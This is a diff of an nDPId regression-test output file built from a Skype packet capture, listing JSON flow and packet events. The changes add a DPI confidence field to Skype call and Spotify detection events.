-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/2XIAAEARv6rAqAEinTeCjzLdnFEAK32DnCoCUchv5aDS7Qgi\/2x8dTOyi7BA\/ZCxsEvRrtCtnVEnyoU="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431969668503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1431969668503,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABItzYAAEARPsPAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA749YAAEARS6HAqAEi1cezqDLdnEYAJ90VnCwCpNRKktf4Qi\/bdq+yPcZvRHBM0A5YqXcB1iPXfA=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5xgUAAEARIZrAqAEinTg0EjLdgQkAJZdLnC4CEFtjW45ZN3BY7kxO5IarNwXkC3qnvdRTMpg="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9eQsAAEARtnjAqAEi1cezmjLdnGIAKUaUnDACIJVxUOV7zs6xYvMq6EYi6E1yxVZ+ttOndiNbBj7C"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1a3EAAEARxCLAqAEi1cezkjLdnF4AIe2\/nDICH70PgbauE\/TDe2jJ8Wqi40Tw\/dlcGg=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4XYMAAEARoWrAqAEib91KIDLdnEkAJPvTnDQCE7A5vpizco713fAfzrDXfyhKHUClX6xRMw=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7f50AAEAR4bnAqAEiQAQXjTLdnEQAJ4UFnDYCwyd8EHi1QBLXs1KZU1iJVh3lwESpNueb3tiaIg=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ovIAAEAR9aDAqAEiQTffHDLdnFoAKLy9nDgCw\/trQW+yBgre1M\/iGb+xrR1ukS\/k6lR8WrcUGNw="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431969671427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969671427,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3g4AAEARUfvAqAEinTfroTLdnEsALJxsnDoCIAhyfiAhHAGT2pPsDhuBxLXCl+D8eTQt2\/ZTx9MpLSju"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969671427,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
